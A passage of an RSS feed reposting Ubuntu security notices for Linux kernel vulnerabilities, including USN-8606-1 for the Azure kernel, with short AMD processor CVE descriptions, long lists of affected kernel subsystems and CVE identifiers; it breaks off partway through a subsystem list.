attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Remote Processor subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - SPI subsystem;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
  - Distributed Switch Architecture;
  - IPv4 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - Cryptographic library;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - IPv6 networking;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - Landlock security;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40135, CVE-2025-40150, CVE-2025-68175, CVE-2025-68239,
CVE-2025-68334, CVE-2025-68736, CVE-2025-71152, CVE-2025-71161,
CVE-2025-71203, CVE-2025-71221, CVE-2025-71269, CVE-2025-71287,
CVE-2025-71288, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23104, CVE-2026-23118,
CVE-2026-23138, CVE-2026-23154, CVE-2026-23157, CVE-2026-23171,
CVE-2026-23207, CVE-2026-23226, CVE-2026-23227, CVE-2026-23244,
CVE-2026-23245, CVE-2026-23246, CVE-2026-23253, CVE-2026-23255,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23276, CVE-2026-23277,
CVE-2026-23279, CVE-2026-23281, CVE-2026-23284, CVE-2026-23285,
CVE-2026-23286, CVE-2026-23287, CVE-2026-23289, CVE-2026-23290,
CVE-2026-23291, CVE-2026-23292, CVE-2026-23293, CVE-2026-23296,
CVE-2026-23298, CVE-2026-23300, CVE-2026-23302, CVE-2026-23303,
CVE-2026-23304, CVE-2026-23306, CVE-2026-23307, CVE-2026-23308,
CVE-2026-23310, CVE-2026-23312, CVE-2026-23313, CVE-2026-23315,
CVE-2026-23317, CVE-2026-23318, CVE-2026-23319, CVE-2026-23321,
CVE-2026-23324, CVE-2026-23325, CVE-2026-23330, CVE-2026-23334,
CVE-2026-23335, CVE-2026-23336, CVE-2026-23339, CVE-2026-23340,
CVE-2026-23343, CVE-2026-23347, CVE-2026-23352, CVE-2026-23356,
CVE-2026-23357, CVE-2026-23359, CVE-2026-23360, CVE-2026-23361,
CVE-2026-23362, CVE-2026-23363, CVE-2026-23364, CVE-2026-23365,
CVE-2026-23367, CVE-2026-23368, CVE-2026-23369, CVE-2026-23370,
CVE-2026-23372, CVE-2026-23374, CVE-2026-23375, CVE-2026-23378,
CVE-2026-23379, CVE-2026-23381, CVE-2026-23382, CVE-2026-23383,
CVE-2026-23386, CVE-2026-23387, CVE-2026-23388, CVE-2026-23389,
CVE-2026-23391, CVE-2026-23395, CVE-2026-23396, CVE-2026-23397,
CVE-2026-23398, CVE-2026-23399, CVE-2026-23401, CVE-2026-23412,
CVE-2026-23413, CVE-2026-23414, CVE-2026-23418, CVE-2026-23419,
CVE-2026-23420, CVE-2026-23426, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23452, CVE-2026-23454, CVE-2026-23456,
CVE-2026-23457, CVE-2026-23458, CVE-2026-23460, CVE-2026-23461,
CVE-2026-23462, CVE-2026-23463, CVE-2026-23464, CVE-2026-23465,
CVE-2026-23468, CVE-2026-23470, CVE-2026-23474, CVE-2026-23475,
CVE-2026-31389, CVE-2026-31391, CVE-2026-31392, CVE-2026-31393,
CVE-2026-31394, CVE-2026-31396, CVE-2026-31399, CVE-2026-31400,
CVE-2026-31403, CVE-2026-31405, CVE-2026-31407, CVE-2026-31408,
CVE-2026-31409, CVE-2026-31412, CVE-2026-31413, CVE-2026-31414,
CVE-2026-31415, CVE-2026-31416, CVE-2026-31417, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31438, CVE-2026-31439, CVE-2026-31440, CVE-2026-31441,
CVE-2026-31446, CVE-2026-31447, CVE-2026-31449, CVE-2026-31450,
CVE-2026-31451, CVE-2026-31452, CVE-2026-31453, CVE-2026-31454,
CVE-2026-31455, CVE-2026-31458, CVE-2026-31464, CVE-2026-31466,
CVE-2026-31467, CVE-2026-31469, CVE-2026-31470, CVE-2026-31473,
CVE-2026-31474, CVE-2026-31476, CVE-2026-31477, CVE-2026-31480,
CVE-2026-31482, CVE-2026-31483, CVE-2026-31485, CVE-2026-31487,
CVE-2026-31488, CVE-2026-31489, CVE-2026-31492, CVE-2026-31494,
CVE-2026-31495, CVE-2026-31496, CVE-2026-31497, CVE-2026-31498,
CVE-2026-31499, CVE-2026-31500, CVE-2026-31502, CVE-2026-31503,
CVE-2026-31505, CVE-2026-31507, CVE-2026-31508, CVE-2026-31509,
CVE-2026-31510, CVE-2026-31511, CVE-2026-31512, CVE-2026-31515,
CVE-2026-31516, CVE-2026-31518, CVE-2026-31519, CVE-2026-31520,
CVE-2026-31521, CVE-2026-31522, CVE-2026-31523, CVE-2026-31524,
CVE-2026-31525, CVE-2026-31527, CVE-2026-31528, CVE-2026-31530,
CVE-2026-31532, CVE-2026-31540, CVE-2026-31542, CVE-2026-31545,
CVE-2026-31546, CVE-2026-31548, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31554, CVE-2026-31555,
CVE-2026-31556, CVE-2026-31557, CVE-2026-31563, CVE-2026-31565,
CVE-2026-31566, CVE-2026-31570, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31580, CVE-2026-31581,
CVE-2026-31582, CVE-2026-31583, CVE-2026-31584, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31587, CVE-2026-31588, CVE-2026-31590,
CVE-2026-31594, CVE-2026-31595, CVE-2026-31596, CVE-2026-31597,
CVE-2026-31598, CVE-2026-31599, CVE-2026-31602, CVE-2026-31603,
CVE-2026-31604, CVE-2026-31605, CVE-2026-31606, CVE-2026-31610,
CVE-2026-31611, CVE-2026-31612, CVE-2026-31613, CVE-2026-31615,
CVE-2026-31616, CVE-2026-31617, CVE-2026-31618, CVE-2026-31619,
CVE-2026-31622, CVE-2026-31623, CVE-2026-31624, CVE-2026-31625,
CVE-2026-31626, CVE-2026-31627, CVE-2026-31628, CVE-2026-31629,
CVE-2026-31634, CVE-2026-31638, CVE-2026-31639, CVE-2026-31642,
CVE-2026-31645, CVE-2026-31646, CVE-2026-31648, CVE-2026-31651,
CVE-2026-31655, CVE-2026-31656, CVE-2026-31658, CVE-2026-31660,
CVE-2026-31661, CVE-2026-31662, CVE-2026-31664, CVE-2026-31665,
CVE-2026-31667, CVE-2026-31670, CVE-2026-31671, CVE-2026-31672,
CVE-2026-31673, CVE-2026-31674, CVE-2026-31675, CVE-2026-31677,
CVE-2026-31678, CVE-2026-31679, CVE-2026-31680, CVE-2026-31681,
CVE-2026-31683, CVE-2026-31684, CVE-2026-31686, CVE-2026-31689,
CVE-2026-31694, CVE-2026-31695, CVE-2026-31696, CVE-2026-31697,
CVE-2026-31698, CVE-2026-31699, CVE-2026-31700, CVE-2026-31701,
CVE-2026-31702, CVE-2026-31704, CVE-2026-31705, CVE-2026-31706,
CVE-2026-31707, CVE-2026-31708, CVE-2026-31709, CVE-2026-31711,
CVE-2026-31712, CVE-2026-31714, CVE-2026-31715, CVE-2026-31716,
CVE-2026-31720, CVE-2026-31721, CVE-2026-31722, CVE-2026-31723,
CVE-2026-31724, CVE-2026-31725, CVE-2026-31726, CVE-2026-31728,
CVE-2026-31729, CVE-2026-31730, CVE-2026-31731, CVE-2026-31737,
CVE-2026-31738, CVE-2026-31740, CVE-2026-31741, CVE-2026-31747,
CVE-2026-31748, CVE-2026-31749, CVE-2026-31751, CVE-2026-31752,
CVE-2026-31754, CVE-2026-31755, CVE-2026-31756, CVE-2026-31758,
CVE-2026-31759, CVE-2026-31761, CVE-2026-31762, CVE-2026-31763,
CVE-2026-31767, CVE-2026-31768, CVE-2026-31770, CVE-2026-31772,
CVE-2026-31773, CVE-2026-31778, CVE-2026-31779, CVE-2026-31780,
CVE-2026-31781, CVE-2026-31788, CVE-2026-43007, CVE-2026-43012,
CVE-2026-43013, CVE-2026-43014, CVE-2026-43015, CVE-2026-43016,
CVE-2026-43017, CVE-2026-43018, CVE-2026-43019, CVE-2026-43020,
CVE-2026-43023, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026,
CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43032,
CVE-2026-43035, CVE-2026-43036, CVE-2026-43040, CVE-2026-43041,
CVE-2026-43043, CVE-2026-43044, CVE-2026-43046, CVE-2026-43047,
CVE-2026-43049, CVE-2026-43050, CVE-2026-43051, CVE-2026-43052,
CVE-2026-43054, CVE-2026-43056, CVE-2026-43057, CVE-2026-43058,
CVE-2026-43059, CVE-2026-43060, CVE-2026-43061, CVE-2026-43062,
CVE-2026-43064, CVE-2026-43065, CVE-2026-43066, CVE-2026-43068,
CVE-2026-43069, CVE-2026-43072, CVE-2026-43073, CVE-2026-43074,
CVE-2026-43075, CVE-2026-43076, CVE-2026-43079, CVE-2026-43080,
CVE-2026-43081, CVE-2026-43082, CVE-2026-43084, CVE-2026-43085,
CVE-2026-43086, CVE-2026-43088, CVE-2026-43089, CVE-2026-43091,
CVE-2026-43092, CVE-2026-43093, CVE-2026-43094, CVE-2026-43098,
CVE-2026-43099, CVE-2026-43103, CVE-2026-43104, CVE-2026-43105,
CVE-2026-43107, CVE-2026-43109, CVE-2026-43110, CVE-2026-43111,
CVE-2026-43112, CVE-2026-43113, CVE-2026-43119, CVE-2026-43120,
CVE-2026-43129, CVE-2026-43162, CVE-2026-43245, CVE-2026-43252,
CVE-2026-43265, CVE-2026-43281, CVE-2026-43324, CVE-2026-43327,
CVE-2026-43328, CVE-2026-43329, CVE-2026-43330, CVE-2026-43332,
CVE-2026-43333, CVE-2026-43334, CVE-2026-43336, CVE-2026-43338,
CVE-2026-43339, CVE-2026-43340, CVE-2026-43342, CVE-2026-43343,
CVE-2026-43345, CVE-2026-43350, CVE-2026-43355, CVE-2026-43357,
CVE-2026-43359, CVE-2026-43360, CVE-2026-43361, CVE-2026-43362,
CVE-2026-43363, CVE-2026-43365, CVE-2026-43366, CVE-2026-43368,
CVE-2026-43370, CVE-2026-43371, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43380, CVE-2026-43381, CVE-2026-43382,
CVE-2026-43386, CVE-2026-43387, CVE-2026-43395, CVE-2026-43397,
CVE-2026-43405, CVE-2026-43408, CVE-2026-43409, CVE-2026-43411,
CVE-2026-43412, CVE-2026-43413, CVE-2026-43415, CVE-2026-43419,
CVE-2026-43420, CVE-2026-43421, CVE-2026-43424, CVE-2026-43425,
CVE-2026-43426, CVE-2026-43427, CVE-2026-43428, CVE-2026-43429,
CVE-2026-43430, CVE-2026-43432, CVE-2026-43436, CVE-2026-43437,
CVE-2026-43439, CVE-2026-43441, CVE-2026-43445, CVE-2026-43448,
CVE-2026-43449, CVE-2026-43450, CVE-2026-43451, CVE-2026-43452,
CVE-2026-43453, CVE-2026-43455, CVE-2026-43456, CVE-2026-43457,
CVE-2026-43458, CVE-2026-43459, CVE-2026-43466, CVE-2026-43467,
CVE-2026-43468, CVE-2026-43469, CVE-2026-43471, CVE-2026-43472,
CVE-2026-43473, CVE-2026-43475, CVE-2026-43476, CVE-2026-43480,
CVE-2026-43483, CVE-2026-43484, CVE-2026-43488, CVE-2026-43490,
CVE-2026-43491, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43499, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45855,
CVE-2026-45858, CVE-2026-45899, CVE-2026-45911, CVE-2026-45920,
CVE-2026-45924, CVE-2026-45942, CVE-2026-45943, CVE-2026-45956,
CVE-2026-45958, CVE-2026-45985, CVE-2026-45986, CVE-2026-45987,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46044,
CVE-2026-46046, CVE-2026-46047, CVE-2026-46049, CVE-2026-46050,
CVE-2026-46051, CVE-2026-46052, CVE-2026-46053, CVE-2026-46056,
CVE-2026-46058, CVE-2026-46061, CVE-2026-46062, CVE-2026-46063,
CVE-2026-46064, CVE-2026-46065, CVE-2026-46068, CVE-2026-46069,
CVE-2026-46070, CVE-2026-46072, CVE-2026-46073, CVE-2026-46075,
CVE-2026-46076, CVE-2026-46077, CVE-2026-46078, CVE-2026-46079,
CVE-2026-46080, CVE-2026-46082, CVE-2026-46083, CVE-2026-46084,
CVE-2026-46086, CVE-2026-46088, CVE-2026-46089, CVE-2026-46090,
CVE-2026-46091, CVE-2026-46092, CVE-2026-46094, CVE-2026-46098,
CVE-2026-46099, CVE-2026-46101, CVE-2026-46102, CVE-2026-46103,
CVE-2026-46106, CVE-2026-46107, CVE-2026-46108, CVE-2026-46110,
CVE-2026-46111, CVE-2026-46112, CVE-2026-46113, CVE-2026-46114,
CVE-2026-46116, CVE-2026-46117, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46131, CVE-2026-46132, CVE-2026-46133, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46186, CVE-2026-46187,
CVE-2026-46189, CVE-2026-46190, CVE-2026-46191, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46204,
CVE-2026-46205, CVE-2026-46206, CVE-2026-46207, CVE-2026-46208,
CVE-2026-46209, CVE-2026-46211, CVE-2026-46212, CVE-2026-46214,
CVE-2026-46218, CVE-2026-46219, CVE-2026-46220, CVE-2026-46225,
CVE-2026-46226, CVE-2026-46227, CVE-2026-46229, CVE-2026-46230,
CVE-2026-46231, CVE-2026-46232, CVE-2026-46233, CVE-2026-46234,
CVE-2026-46235, CVE-2026-46236, CVE-2026-46238, CVE-2026-46241,
CVE-2026-46273, CVE-2026-46274, CVE-2026-46280, CVE-2026-46282,
CVE-2026-46285, CVE-2026-46286, CVE-2026-46287, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-52911, CVE-2026-52920, CVE-2026-52925,
CVE-2026-52933, CVE-2026-52936, CVE-2026-52951, CVE-2026-52954,
CVE-2026-52955, CVE-2026-52957, CVE-2026-52958, CVE-2026-52961,
CVE-2026-52962, CVE-2026-52963, CVE-2026-52964, CVE-2026-52967,
CVE-2026-52968, CVE-2026-52969, CVE-2026-52970, CVE-2026-52974,
CVE-2026-52975, CVE-2026-52977, CVE-2026-52981, CVE-2026-52982,
CVE-2026-52984, CVE-2026-52985, CVE-2026-52986, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52992, CVE-2026-52993, CVE-2026-52995,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53001, CVE-2026-53002,
CVE-2026-53003, CVE-2026-53004, CVE-2026-53006, CVE-2026-53011,
CVE-2026-53012, CVE-2026-53013, CVE-2026-53014, CVE-2026-53015,
CVE-2026-53016, CVE-2026-53021, CVE-2026-53022, CVE-2026-53023,
CVE-2026-53032, CVE-2026-53033, CVE-2026-53034, CVE-2026-53035,
CVE-2026-53036, CVE-2026-53037, CVE-2026-53039, CVE-2026-53040,
CVE-2026-53041, CVE-2026-53043, CVE-2026-53045, CVE-2026-53046,
CVE-2026-53047, CVE-2026-53048, CVE-2026-53049, CVE-2026-53050,
CVE-2026-53052, CVE-2026-53056, CVE-2026-53058, CVE-2026-53059,
CVE-2026-53060, CVE-2026-53061, CVE-2026-53062, CVE-2026-53063,
CVE-2026-53064, CVE-2026-53065, CVE-2026-53066, CVE-2026-53068,
CVE-2026-53069, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53088, CVE-2026-53093, CVE-2026-53094,
CVE-2026-53096, CVE-2026-53097, CVE-2026-53098, CVE-2026-53110,
CVE-2026-53111, CVE-2026-53112, CVE-2026-53115, CVE-2026-53117,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53126, CVE-2026-53128,
CVE-2026-53130, CVE-2026-53279, CVE-2026-53287, CVE-2026-53289,
CVE-2026-53291, CVE-2026-53293, CVE-2026-53294, CVE-2026-53295,
CVE-2026-53296, CVE-2026-53303, CVE-2026-53304, CVE-2026-53306,
CVE-2026-53309, CVE-2026-53314, CVE-2026-53320, CVE-2026-53369,
CVE-2026-53374, CVE-2026-53375, CVE-2026-53376, CVE-2026-53379,
CVE-2026-63838, CVE-2026-63843, CVE-2026-63844, CVE-2026-63845,
CVE-2026-63846, CVE-2026-63847, CVE-2026-63848, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63854, CVE-2026-63855, CVE-2026-63856,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63865,
CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8606-1: Linux kernel (Azure) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691498/unix-server/usn-8606-1-linux-kernel-azure-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691498/unix-server/usn-8606-1-linux-kernel-azure-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:41 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - RNBD block device driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - Broadcom VK accelerator driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MOST (Media Oriented Systems Transport) drivers;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
  - NVME drivers;
  - Device tree and open firmware driver;
  - PCI subsystem;
  - Performance monitor drivers;
  - Pin controllers subsystem;
  - x86 platform drivers;
  - Broadcom BCM2835 power domain driver;
  - Generic PM domains;
  - i.MX PM domains;
  - Power supply drivers;
  - RapidIO drivers;
  - RAS (Reliability, Availability, Serviceability) subsystem;
  - Remote Processor subsystem;
  - RPMSG subsystem;
  - S/390 drivers;
  - SCSI subsystem;
  - SLIMbus drivers;
  - Freescale SoC drivers;
  - MediaTek SoC drivers;
  - Microchip PolarFire SoC system controller driver;
  - Texas Instruments SoC drivers;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - SM750 framebuffer staging driver;
  - TCM subsystem;
  - Thermal drivers;
  - TTY drivers;
  - UFS subsystem;
  - Cadence USB3 driver;
  - ChipIdea USB driver;
  - USB Device Class drivers;
  - ULPI bus;
  - USB core drivers;
  - DesignWare USB2 driver;
  - DesignWare USB3 driver;
  - USB Gadget drivers;
  - USB Host Controller drivers;
  - Mustek MDC800 USB digital camera driver;
  - USB YUREX driver;
  - Renesas USBHS Controller drivers;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Virtio Host (VHOST) subsystem;
  - Framebuffer layer;
  - TSM TDX Guest driver;
  - Xen hypervisor drivers;
  - File systems infrastructure;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - Ext4 file system;
  - F2FS file system;
  - FAT file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - Journaling layer for block devices (JBD2);
  - JFS file system;
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Proc file system;
  - Pstore file system;
  - Diskquota system;
  - SMB network file system;
  - SquashFS file system;
  - Tracing file system;
  - UDF file system;
  - XFS file system;
  - Audit subsystem;
  - Kernel CPU control infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Memory Management;
  - Integrity Measurement Architecture(IMA) framework;
  - KVM subsystem;
  - Memory management;
  - Networking core;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Linux Security Modules (LSM) Framework;
  - Tracing infrastructure;
  - Network traffic control;
